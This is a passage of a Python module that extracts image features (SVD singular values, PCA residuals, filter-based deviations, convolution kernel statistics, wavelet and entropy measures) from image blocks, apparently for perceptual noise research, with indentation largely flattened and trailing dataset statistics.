data = abs(np.array(sv_values) - np.array(ica_sv_values))
if data_type == 'svd_trunc_diff':
current_image = transform.get_LAB_L(block)
svd = TruncatedSVD(n_components=30, n_iter=100, random_state=42)
transformed_image = svd.fit_transform(current_image)
restored_image = svd.inverse_transform(transformed_image)
reduced_image = (current_image - restored_image)
U, s, V = compression.get_SVD(reduced_image)
data = s
if data_type == 'ipca_diff':
current_image = transform.get_LAB_L(block)
transformer = IncrementalPCA(n_components=20, batch_size=25)
transformed_image = transformer.fit_transform(current_image)
restored_image = transformer.inverse_transform(transformed_image)
reduced_image = (current_image - restored_image)
U, s, V = compression.get_SVD(reduced_image)
data = s
if data_type == 'svd_reconstruct':
reconstructed_interval = (90, 200)
begin, end = reconstructed_interval
lab_img = transform.get_LAB_L(block)
lab_img = np.array(lab_img, 'uint8')
U, s, V = lin_svd(lab_img, full_matrices=True)
smat = np.zeros((end-begin, end-begin), dtype=complex)
smat[:, :] = np.diag(s[begin:end])
output_img = np.dot(U[:, begin:end], np.dot(smat, V[begin:end, :]))
output_img = np.array(output_img, 'uint8')
data = compression.get_SVD_s(output_img)
if 'sv_std_filters' in data_type:
# convert into lab by default to apply filters
lab_img = transform.get_LAB_L(block)
arr = np.array(lab_img)
images = []
# Apply list of filter on arr
images.append(medfilt2d(arr, [3, 3]))
images.append(medfilt2d(arr, [5, 5]))
images.append(wiener(arr, [3, 3]))
images.append(wiener(arr, [5, 5]))
# By default computation of current block image
s_arr = compression.get_SVD_s(arr)
sv_vector = [s_arr]
# for each new image apply SVD and get SV
for img in images:
s = compression.get_SVD_s(img)
sv_vector.append(s)
sv_array = np.array(sv_vector)
_, length = sv_array.shape
sv_std = []
# normalize each SV vectors and compute standard deviation for each sub vectors
for i in range(length):
sv_array[:, i] = utils.normalize_arr(sv_array[:, i])
sv_std.append(np.std(sv_array[:, i]))
indices = []
if 'lowest' in data_type:
indices = utils.get_indices_of_lowest_values(sv_std, 200)
if 'highest' in data_type:
indices = utils.get_indices_of_highest_values(sv_std, 200)
# data are arranged following std trend computed
data = s_arr[indices]
# with the use of wavelet
if 'wave_sv_std_filters' in data_type:
# convert into lab by default to apply filters
lab_img = transform.get_LAB_L(block)
arr = np.array(lab_img)
images = []
# Apply list of filter on arr
images.append(medfilt2d(arr, [3, 3]))
# By default computation of current block image
s_arr = compression.get_SVD_s(arr)
sv_vector = [s_arr]
# for each new image apply SVD and get SV
for img in images:
s = compression.get_SVD_s(img)
sv_vector.append(s)
sv_array = np.array(sv_vector)
_, length = sv_array.shape
sv_std = []
# normalize each SV vectors and compute standard deviation for each sub vectors
for i in range(length):
sv_array[:, i] = utils.normalize_arr(sv_array[:, i])
sv_std.append(np.std(sv_array[:, i]))
indices = []
if 'lowest' in data_type:
indices = utils.get_indices_of_lowest_values(sv_std, 200)
if 'highest' in data_type:
indices = utils.get_indices_of_highest_values(sv_std, 200)
# data are arranged following std trend computed
data = s_arr[indices]
# with the use of wavelet
if 'sv_std_filters_full' in data_type:
# convert into lab by default to apply filters
lab_img = transform.get_LAB_L(block)
arr = np.array(lab_img)
images = []
# Apply list of filter on arr
kernel = np.ones((3,3),np.float32)/9
images.append(cv2.filter2D(arr,-1,kernel))
kernel = np.ones((5,5),np.float32)/25
images.append(cv2.filter2D(arr,-1,kernel))
images.append(cv2.GaussianBlur(arr, (3, 3), 0.5))
images.append(cv2.GaussianBlur(arr, (3, 3), 1))
images.append(cv2.GaussianBlur(arr, (3, 3), 1.5))
images.append(cv2.GaussianBlur(arr, (5, 5), 0.5))
images.append(cv2.GaussianBlur(arr, (5, 5), 1))
images.append(cv2.GaussianBlur(arr, (5, 5), 1.5))
images.append(medfilt2d(arr, [3, 3]))
images.append(medfilt2d(arr, [5, 5]))
images.append(wiener(arr, [3, 3]))
images.append(wiener(arr, [5, 5]))
wave = w2d(arr, 'db1', 2)
images.append(np.array(wave, 'float64'))
# By default computation of current block image
s_arr = compression.get_SVD_s(arr)
sv_vector = [s_arr]
# for each new image apply SVD and get SV
for img in images:
s = compression.get_SVD_s(img)
sv_vector.append(s)
sv_array = np.array(sv_vector)
_, length = sv_array.shape
sv_std = []
# normalize each SV vectors and compute standard deviation for each sub vectors
for i in range(length):
sv_array[:, i] = utils.normalize_arr(sv_array[:, i])
sv_std.append(np.std(sv_array[:, i]))
indices = []
if 'lowest' in data_type:
indices = utils.get_indices_of_lowest_values(sv_std, 200)
if 'highest' in data_type:
indices = utils.get_indices_of_highest_values(sv_std, 200)
# data are arranged following std trend computed
data = s_arr[indices]
if 'sv_entropy_std_filters' in data_type:
lab_img = transform.get_LAB_L(block)
arr = np.array(lab_img)
images = []
kernel = np.ones((3,3),np.float32)/9
images.append(cv2.filter2D(arr,-1,kernel))
kernel = np.ones((5,5),np.float32)/25
images.append(cv2.filter2D(arr,-1,kernel))
images.append(cv2.GaussianBlur(arr, (3, 3), 0.5))
images.append(cv2.GaussianBlur(arr, (3, 3), 1))
images.append(cv2.GaussianBlur(arr, (3, 3), 1.5))
images.append(cv2.GaussianBlur(arr, (5, 5), 0.5))
images.append(cv2.GaussianBlur(arr, (5, 5), 1))
images.append(cv2.GaussianBlur(arr, (5, 5), 1.5))
images.append(medfilt2d(arr, [3, 3]))
images.append(medfilt2d(arr, [5, 5]))
images.append(wiener(arr, [3, 3]))
images.append(wiener(arr, [5, 5]))
wave = w2d(arr, 'db1', 2)
images.append(np.array(wave, 'float64'))
sv_vector = []
sv_entropy_list = []
# for each new image apply SVD and get SV
for img in images:
s = compression.get_SVD_s(img)
sv_vector.append(s)
sv_entropy = [utils.get_entropy_contribution_of_i(s, id_sv) for id_sv, sv in enumerate(s)]
sv_entropy_list.append(sv_entropy)
sv_std = []
sv_array = np.array(sv_vector)
_, length = sv_array.shape
# normalize each SV vectors and compute standard deviation for each sub vectors
for i in range(length):
sv_array[:, i] = utils.normalize_arr(sv_array[:, i])
sv_std.append(np.std(sv_array[:, i]))
indices = []
if 'lowest' in data_type:
indices = utils.get_indices_of_lowest_values(sv_std, 200)
if 'highest' in data_type:
indices = utils.get_indices_of_highest_values(sv_std, 200)
# data are arranged following std trend computed
s_arr = compression.get_SVD_s(arr)
data = s_arr[indices]
if 'convolutional_kernels' in data_type:
sub_zones = segmentation.divide_in_blocks(block, (20, 20))
data = []
diff_std_list_3 = []
diff_std_list_5 = []
diff_mean_list_3 = []
diff_mean_list_5 = []
plane_std_list_3 = []
plane_std_list_5 = []
plane_mean_list_3 = []
plane_mean_list_5 = []
plane_max_std_list_3 = []
plane_max_std_list_5 = []
plane_max_mean_list_3 = []
plane_max_mean_list_5 = []
for sub_zone in sub_zones:
l_img = transform.get_LAB_L(sub_zone)
normed_l_img = utils.normalize_2D_arr(l_img)
# bilateral with window of size (3, 3)
normed_diff = convolution.convolution2D(normed_l_img, kernels.min_bilateral_diff, (3, 3))
std_diff = np.std(normed_diff)
mean_diff = np.mean(normed_diff)
diff_std_list_3.append(std_diff)
diff_mean_list_3.append(mean_diff)
# bilateral with window of size (5, 5)
normed_diff = convolution.convolution2D(normed_l_img, kernels.min_bilateral_diff, (5, 5))
std_diff = np.std(normed_diff)
mean_diff = np.mean(normed_diff)
diff_std_list_5.append(std_diff)
diff_mean_list_5.append(mean_diff)
# plane mean with window of size (3, 3)
normed_plane_mean = convolution.convolution2D(normed_l_img, kernels.plane_mean, (3, 3))
std_plane_mean = np.std(normed_plane_mean)
mean_plane_mean = np.mean(normed_plane_mean)
plane_std_list_3.append(std_plane_mean)
plane_mean_list_3.append(mean_plane_mean)
# plane mean with window of size (5, 5)
normed_plane_mean = convolution.convolution2D(normed_l_img, kernels.plane_mean, (5, 5))
std_plane_mean = np.std(normed_plane_mean)
mean_plane_mean = np.mean(normed_plane_mean)
plane_std_list_5.append(std_plane_mean)
plane_mean_list_5.append(mean_plane_mean)
# plane max error with window of size (3, 3)
normed_plane_max = convolution.convolution2D(normed_l_img, kernels.plane_max_error, (3, 3))
std_plane_max = np.std(normed_plane_max)
mean_plane_max = np.mean(normed_plane_max)
plane_max_std_list_3.append(std_plane_max)
plane_max_mean_list_3.append(mean_plane_max)
# plane max error with window of size (5, 5)
normed_plane_max = convolution.convolution2D(normed_l_img, kernels.plane_max_error, (5, 5))
std_plane_max = np.std(normed_plane_max)
mean_plane_max = np.mean(normed_plane_max)
plane_max_std_list_5.append(std_plane_max)
plane_max_mean_list_5.append(mean_plane_max)
diff_std_list_3 = np.array(diff_std_list_3)
diff_std_list_5 = np.array(diff_std_list_5)
diff_mean_list_3 = np.array(diff_mean_list_3)
diff_mean_list_5 = np.array(diff_mean_list_5)
plane_std_list_3 = np.array(plane_std_list_3)
plane_std_list_5 = np.array(plane_std_list_5)
plane_mean_list_3 = np.array(plane_mean_list_3)
plane_mean_list_5 = np.array(plane_mean_list_5)
plane_max_std_list_3 = np.array(plane_max_std_list_3)
plane_max_std_list_5 = np.array(plane_max_std_list_5)
plane_max_mean_list_3 = np.array(plane_max_mean_list_3)
plane_max_mean_list_5 = np.array(plane_max_mean_list_5)
if 'std_max_blocks' in data_type:
data.append(np.std(diff_std_list_3[0:int(len(sub_zones)/5)]))
data.append(np.std(diff_mean_list_3[0:int(len(sub_zones)/5)]))
data.append(np.std(diff_std_list_5[0:int(len(sub_zones)/5)]))
data.append(np.std(diff_mean_list_5[0:int(len(sub_zones)/5)]))
data.append(np.std(plane_std_list_3[0:int(len(sub_zones)/5)]))
data.append(np.std(plane_mean_list_3[0:int(len(sub_zones)/5)]))
data.append(np.std(plane_std_list_5[0:int(len(sub_zones)/5)]))
data.append(np.std(plane_mean_list_5[0:int(len(sub_zones)/5)]))
data.append(np.std(plane_max_std_list_3[0:int(len(sub_zones)/5)]))
data.append(np.std(plane_max_mean_list_3[0:int(len(sub_zones)/5)]))
data.append(np.std(plane_max_std_list_5[0:int(len(sub_zones)/5)]))
data.append(np.std(plane_max_mean_list_5[0:int(len(sub_zones)/5)]))
if 'mean_max_blocks' in data_type:
data.append(np.mean(diff_std_list_3[0:int(len(sub_zones)/5)]))
data.append(np.mean(diff_mean_list_3[0:int(len(sub_zones)/5)]))
data.append(np.mean(diff_std_list_5[0:int(len(sub_zones)/5)]))
data.append(np.mean(diff_mean_list_5[0:int(len(sub_zones)/5)]))
data.append(np.mean(plane_std_list_3[0:int(len(sub_zones)/5)]))
data.append(np.mean(plane_mean_list_3[0:int(len(sub_zones)/5)]))
data.append(np.mean(plane_std_list_5[0:int(len(sub_zones)/5)]))
data.append(np.mean(plane_mean_list_5[0:int(len(sub_zones)/5)]))
data.append(np.mean(plane_max_std_list_3[0:int(len(sub_zones)/5)]))
data.append(np.mean(plane_max_mean_list_3[0:int(len(sub_zones)/5)]))
data.append(np.mean(plane_max_std_list_5[0:int(len(sub_zones)/5)]))
data.append(np.mean(plane_max_mean_list_5[0:int(len(sub_zones)/5)]))
if 'std_normed' in data_type:
data.append(np.std(diff_std_list_3))
data.append(np.std(diff_mean_list_3))
data.append(np.std(diff_std_list_5))
data.append(np.std(diff_mean_list_5))
data.append(np.std(plane_std_list_3))
data.append(np.std(plane_mean_list_3))
data.append(np.std(plane_std_list_5))
data.append(np.std(plane_mean_list_5))
data.append(np.std(plane_max_std_list_3))
data.append(np.std(plane_max_mean_list_3))
data.append(np.std(plane_max_std_list_5))
data.append(np.std(plane_max_mean_list_5))
if 'mean_normed' in data_type:
data.append(np.mean(diff_std_list_3))
data.append(np.mean(diff_mean_list_3))
data.append(np.mean(diff_std_list_5))
data.append(np.mean(diff_mean_list_5))
data.append(np.mean(plane_std_list_3))
data.append(np.mean(plane_mean_list_3))
data.append(np.mean(plane_std_list_5))
data.append(np.mean(plane_mean_list_5))
data.append(np.mean(plane_max_std_list_3))
data.append(np.mean(plane_max_mean_list_3))
data.append(np.mean(plane_max_std_list_5))
data.append(np.mean(plane_max_mean_list_5))
data = np.array(data)
if data_type == 'convolutional_kernel_stats_svd':
l_img = transform.get_LAB_L(block)
normed_l_img = utils.normalize_2D_arr(l_img)
# bilateral with window of size (5, 5)
normed_diff = convolution.convolution2D(normed_l_img, kernels.min_bilateral_diff, (5, 5))
# getting sigma vector from SVD compression
s = compression.get_SVD_s(normed_diff)
data = s
if data_type == 'svd_entropy':
l_img = transform.get_LAB_L(block)
blocks = segmentation.divide_in_blocks(l_img, (20, 20))
values = []
for b in blocks:
sv = compression.get_SVD_s(b)
values.append(utils.get_entropy(sv))
data = np.array(values)
if data_type == 'svd_entropy_20':
l_img = transform.get_LAB_L(block)
blocks = segmentation.divide_in_blocks(l_img, (20, 20))
values = []
for b in blocks:
sv = compression.get_SVD_s(b)
values.append(utils.get_entropy(sv))
data = np.array(values)
if data_type == 'svd_entropy_noise_20':
l_img = transform.get_LAB_L(block)
blocks = segmentation.divide_in_blocks(l_img, (20, 20))
values = []
for b in blocks:
sv = compression.get_SVD_s(b)
sv_size = len(sv)
values.append(utils.get_entropy(sv[int(sv_size / 4):]))
data = np.array(values)
return data
def w2d(arr, mode='haar', level=1):
    # convert to float and scale to [0, 1]
    imArray = np.divide(arr, 255.0)
# compute coefficients
coeffs=pywt.wavedec2(imArray, mode, level=level)
#Process Coefficients
coeffs_H=list(coeffs)
coeffs_H[0] *= 0
# reconstruction
imArray_H = pywt.waverec2(coeffs_H, mode)
imArray_H *= 255
imArray_H = np.uint8(imArray_H)
return imArray_H
def _get_mscn_variance(block, sub_block_size=(50, 50)):
blocks = segmentation.divide_in_blocks(block, sub_block_size)
data = []
for block in blocks:
mscn_coefficients = transform.get_mscn_coefficients(block)
flat_coeff = mscn_coefficients.flatten()
data.append(np.var(flat_coeff))
return np.sort(data)
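# Hypothetical usage sketch (not part of the original module): `data_type`
# selects one of the feature branches in get_image_features above. The wrapper
# and the image path argument below are illustrative assumptions only.
def _demo_extract_features(image_path, data_type='svd_entropy'):
    # Load an RGB zone image from disk and compute the requested features
    block = Image.open(image_path)
    return get_image_features(data_type, block)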
| 32.849462
| 103
| 0.627169
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 3,226
| 0.131997
|